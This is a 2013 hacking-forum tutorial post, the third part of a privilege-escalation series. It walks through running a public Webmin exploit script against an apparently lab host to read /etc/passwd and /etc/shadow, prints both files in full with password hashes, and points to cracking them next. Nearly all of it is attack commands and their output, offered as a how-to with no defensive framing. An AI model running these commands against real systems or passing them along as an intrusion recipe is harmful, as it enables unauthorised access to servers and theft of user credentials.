1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

TUTORIAL - Privilege Escalation; Part III

Discussion in 'Privilege Escalation' started by Witranx, Apr 1, 2013.

  1. Witranx

    Witranx Staff Member

    Joined:
    Mar 25, 2013
    Messages:
    27
    Likes Received:
    21
    ...Continued from Part II
    To get username and password in Linux operating system we can try to view /etc/passwd.
    root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /etc/passwd 0
    WEBMIN EXPLOIT !!!!! coded by UmZ!
    Comments and Suggestions are welcome at umz32.dll [at] gmail.com
    Vulnerability disclose at securitydot.net
    I am just coding it in perl 'cuz I hate PHP!
    Attacking 192.168.0.21 on port 10000!
    FILENAME: /etc/passwd
    FILE CONTENT STARTED
    -----------------------------------
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    dhcp:x:100:101::/nonexistent:/bin/false
    syslog:x:101:102::/home/syslog:/bin/false
    klog:x:102:103::/home/klog:/bin/false
    mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
    vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
    obama:x:1001:1001::/home/obama:/bin/bash
    osama:x:1002:1002::/home/osama:/bin/bash
    yomama:x:1003:1003::/home/yomama:/bin/bash
    -------------------------------------

    We have known that the username of the OS target is obama, osama, and oyama...
    Then we have to get password in /etc/shadow
    root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /etc/shadow 0
    WEBMIN EXPLOIT !!!!! coded by UmZ!
    Comments and Suggestions are welcome at umz32.dll [at] gmail.com
    Vulnerability disclose at securitydot.net
    I am just coding it in perl 'cuz I hate PHP!
    Attacking 192.168.0.21 on port 10000!
    FILENAME: /etc/shadow
    FILE CONTENT STARTED
    -----------------------------------
    Code:
    root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
    daemon:*:14040:0:99999:7:::
    bin:*:14040:0:99999:7:::
    sys:*:14040:0:99999:7:::
    sync:*:14040:0:99999:7:::
    games:*:14040:0:99999:7:::
    man:*:14040:0:99999:7:::
    lp:*:14040:0:99999:7:::
    mail:*:14040:0:99999:7:::
    news:*:14040:0:99999:7:::
    uucp:*:14040:0:99999:7:::
    proxy:*:14040:0:99999:7:::
    www-data:*:14040:0:99999:7:::
    backup:*:14040:0:99999:7:::
    list:*:14040:0:99999:7:::
    irc:*:14040:0:99999:7:::
    gnats:*:14040:0:99999:7:::
    nobody:*:14040:0:99999:7:::
    dhcp:!:14040:0:99999:7:::
    syslog:!:14040:0:99999:7:::
    klog:!:14040:0:99999:7:::
    mysql:!:14040:0:99999:7:::
    sshd:!:14040:0:99999:7:::
    vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
    obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
    osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
    yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
    Now we got the encrypted password, we can cracked it using privilege escalation tool is backtrack..
     
    #1
    Last edited by a moderator: Jun 22, 2014

Share This Page